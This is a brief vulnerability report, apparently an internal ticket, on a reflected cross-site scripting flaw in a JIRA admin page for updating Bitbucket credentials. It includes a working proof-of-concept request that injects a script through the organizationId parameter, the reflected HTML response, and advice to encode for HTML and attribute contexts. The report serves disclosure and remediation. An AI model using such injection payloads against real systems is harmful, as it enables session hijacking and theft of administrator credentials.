OrganisationId is passed unfiltered into the results page. Contents of the field persist through the "missing XSRF token" screen, so exploitation is trivial - just get your victim to click on the link.

GET /secure/admin/UpdateBitbucketCredentials.jspa?organizationId="><script>javascript:alert(1)</script>&adminPasswordUp=5543%21%25tinfoil_secret&userNAMEUp=tinfoil_NAME&atl_token=BYRO-9FU9-UCXC-E6R7%7C1abd1e4580f1776e7c4a257414640e59c92fc1b0%7Clin&atl_token_retry_button=Retry+Operation

Reply:

 <h2>Update Bitbucket Password</h2>
  
       <input type="hidden" name="atl_token" value="BYRO-9FU9-UCXC-E6R7|1abd1e4580f1776e7c4a257414640e59c92fc1b0|lin">
       <input type="hidden" id="organizationId" name="organizationId" value=""><script>javascript:alert(1)</script>" />

		<fieldset>

Here the field needs to be encoded for both the HTML context and HTML attribute context, that is both "<" and the quote marks have to be encoded.

See fixing HOWTO at https://extranet.atlassian.com/display/SECCOUNCIL/HOWTO+-+Fixing+JIRA+Security+Issues